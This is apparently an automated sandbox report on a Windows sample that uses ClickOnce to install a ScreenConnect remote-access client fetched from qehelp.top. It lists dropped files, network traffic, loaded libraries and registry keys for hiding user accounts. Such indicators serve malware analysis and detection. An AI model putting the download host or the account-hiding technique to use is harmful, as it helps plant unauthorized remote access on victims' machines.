      Source: dfsvc.exe, 00000001.00000002.2779844547.000002AEF37ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qehelp.top/Bin/ScreenConnect.WindowsFileManager.exe.configo
      Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe, 00000000.00000002.1322014110.0000000000BCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.qehelp.top/Bin/ScreenConu
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49689
      Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49687
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49683
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49682
      Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49693 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49682 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
      Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
      Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49692
      Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
      Source: unknownNetwork traffic detected: HTTP traffic on port 49689 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49683 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49687 -> 443
      Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.7:49682 version: TLS 1.2
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1Jump to dropped file
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4Jump to dropped file

      System Summary

      barindex
      Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exePE Siganture Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeCode function: 0_2_00F2A5E50_2_00F2A5E5
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeCode function: 0_2_00F21BD40_2_00F21BD4
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFB9AAFF9951_2_00007FFB9AAFF995
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFB9AAFAEF51_2_00007FFB9AAFAEF5
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFB9AB12E991_2_00007FFB9AB12E99
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFB9AB033B11_2_00007FFB9AB033B1
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFB9AB027581_2_00007FFB9AB02758
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFB9AAF61981_2_00007FFB9AAF6198
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFB9AAF12111_2_00007FFB9AAF1211
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFB9AB128701_2_00007FFB9AB12870
      Source: ScreenConnect.Client.dll.1.drStatic PE information: No import functions for PE file found
      Source: ScreenConnect.Client.dll.1.drStatic PE information: Data appended to the last section found
      Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, PopoutPanelTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
      Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ProgramTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
      Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, TaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
      Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
      Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
      Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
      Source: ScreenConnect.ClientService.dll.1.dr, WindowsLocalUserExtensions.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
      Source: classification engineClassification label: mal45.evad.winEXE@3/22@1/1
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeCode function: 0_2_00F21000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00F21000
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\DeploymentJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMutant created: NULL
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\DeploymentJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeCommand line argument: dfshim0_2_00F21000
      Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeVirustotal: Detection: 16%
      Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeReversingLabs: Detection: 26%
      Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe"
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"Jump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeSection loaded: dfshim.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dfshim.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dwrite.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: windowscodecs.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptnet.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cabinet.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: uiautomationcore.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeStatic PE information: certificate valid
      Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
      Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
      Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
      Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
      Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
      Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.1.dr
      Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe
      Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.2775388417.000002AE8025E000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2775388417.000002AE8060D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2775388417.000002AE80701000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.1.dr
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: dfsvc.exe, 00000001.00000002.2779844547.000002AEF3630000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe.1.dr
      Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.2775388417.000002AE806D5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2775388417.000002AE80262000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2775388417.000002AE80611000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.Windows.dll.1.dr
      Source: Binary string: lib.pdb source: dfsvc.exe, 00000001.00000002.2779844547.000002AEF3771000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.pdb source: dfsvc.exe, 00000001.00000002.2778707559.000002AEF0608000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdby source: ScreenConnect.WindowsClient.exe.1.dr
      Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer322 source: dfsvc.exe, 00000001.00000002.2779624660.000002AEF1F70000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr
      Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe.1.dr
      Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb1 source: ScreenConnect.WindowsBackstageShell.exe.1.dr
      Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.2775388417.000002AE80609000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2775388417.000002AE80548000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2775388417.000002AE8025A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2775388417.000002AE807DF000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.Core.dll.1.dr
      Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
      Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
      Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
      Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
      Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
      Source: ScreenConnect.Client.dll.1.drStatic PE information: 0xFC5EF32A [Tue Mar 4 13:37:46 2104 UTC]
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeCode function: 0_2_00F21000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00F21000
      Source: SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeStatic PE information: real checksum: 0x14df5 should be: 0x21a94
      Source: ScreenConnect.Client.dll.1.drStatic PE information: real checksum: 0x35012 should be: 0x3049e
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exeCode function: 0_2_00F21BC0 push ecx; ret 0_2_00F21BD3
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFB9A9DD2A5 pushad ; iretd 1_2_00007FFB9A9DD2A6
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFB9AAF6DA3 push esp; retf 1_2_00007FFB9AAF6F32
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFB9AAF6F42 push esp; retf 1_2_00007FFB9AAF6F43
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFB9AAF6EFF push esp; retf 1_2_00007FFB9AAF6F32
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFB9AB08D47 push 8B495CDBh; iretd 1_2_00007FFB9AB08D4C
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFB9AAF7D00 push eax; retf 1_2_00007FFB9AAF7D1D
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFB9AB19460 push cs; retn 5F4Ch1_2_00007FFB9AB1947F
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFB9AAF842E pushad ; ret 1_2_00007FFB9AAF845D
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFB9AAF845E push eax; ret 1_2_00007FFB9AAF846D
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFB9AAF00BD pushad ; iretd 1_2_00007FFB9AAF00C1
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\JB35C8ZA.GJQ\MPCT4ZMN.Q21\ScreenConnect.ClientService.exeJump to dropped file
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\JB35C8ZA.GJQ\MPCT4ZMN.Q21\ScreenConnect.Client.dllJump to dropped file
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\JB35C8ZA.GJQ\MPCT4ZMN.Q21\ScreenConnect.WindowsFileManager.exeJump to dropped file
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\JB35C8ZA.GJQ\MPCT4ZMN.Q21\ScreenConnect.ClientService.dllJump to dropped file
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\JB35C8ZA.GJQ\MPCT4ZMN.Q21\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\JB35C8ZA.GJQ\MPCT4ZMN.Q21\ScreenConnect.Core.dllJump to dropped file
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\JB35C8ZA.GJQ\MPCT4ZMN.Q21\ScreenConnect.WindowsClient.exeJump to dropped file
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\JB35C8ZA.GJQ\MPCT4ZMN.Q21\ScreenConnect.Windows.dllJump to dropped file
      Source: ScreenConnect.ClientService.dll.1.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: ScreenConnect.ClientService.dll.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
      Source: ScreenConnect.Windows.dll.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
